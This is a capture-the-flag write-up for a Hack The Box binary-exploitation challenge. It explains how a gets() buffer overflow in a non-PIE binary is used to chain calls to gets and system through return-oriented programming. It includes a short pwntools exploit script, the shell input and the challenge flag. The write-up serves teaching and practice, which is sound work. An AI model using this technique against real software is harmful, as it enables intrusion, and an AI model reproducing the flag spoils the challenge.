Pwn - Sound of Silence

  • Difficulty : Medium
  • Description : Navigate the shadows in a dimly lit room, silently evading detection as you strategize to outsmart your foes. Employ clever distractions to divert their attention, paving the way for your daring escape!
  • Challenge Files :

Initial Recon

As you run the binary, it clears the shell and asks for some input, thats it

~The Sound of Silence is mesmerising~

>> some input 

And these are the protections of the binary :

    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
    RUNPATH:  b'./glibc/'
  • No canary and no PIE, definitely some overflow involved


Here is the decompiled main function by IDA :

int __fastcall main(int argc, const char **argv, const char **envp)
  char v4[32]; // [rsp+0h] [rbp-20h] BYREF

  system("clear && echo -n '~The Sound of Silence is mesmerising~\n\n>> '");
  return gets(v4, argv);
  • The program is simple, it clears the terminal, echos some statement and call gets on a buffer of 32 bytes


  • Since PIE is disabled we can overflow and ROP to call any of the function (gets or system)

  • In one of the past CTFs I used this trick of calling gets after ROP and passing the input to the next function in the ROP chain and this was supposed to be done

  • I’ll go in more detail about this trick

  • As you return into gets function after buffer overflow this is the current state of the registers

  • If you look closely, the value in rdi register points to a writable section of libc, so if we execute gets in this state, the input will be stored on that address in libc
  • After the gets function is completed the value in rdi remains the same and rip will jump to next value on the stack
  • So if we chain the input like :
<junk bytes> + <address of gets> + <address of system>
  • We will be able to call system function on our input

  • If you know this trick, you can solve this challenge without even debugging

  • This is how to state of the program looks after taking the input from gets

alt text

Here is the exploit script :

from pwn import * 

elf = context.binary = ELF('./sound_of_silence')

p = elf.process()

p.sendline(cyclic(40) + p64(elf.sym['gets'])  + p64(elf.sym['system']))


#$ /bin0sh

Flag : HTB{n0_n33d_4_l34k5_wh3n_u_h4v3_5y5t3m}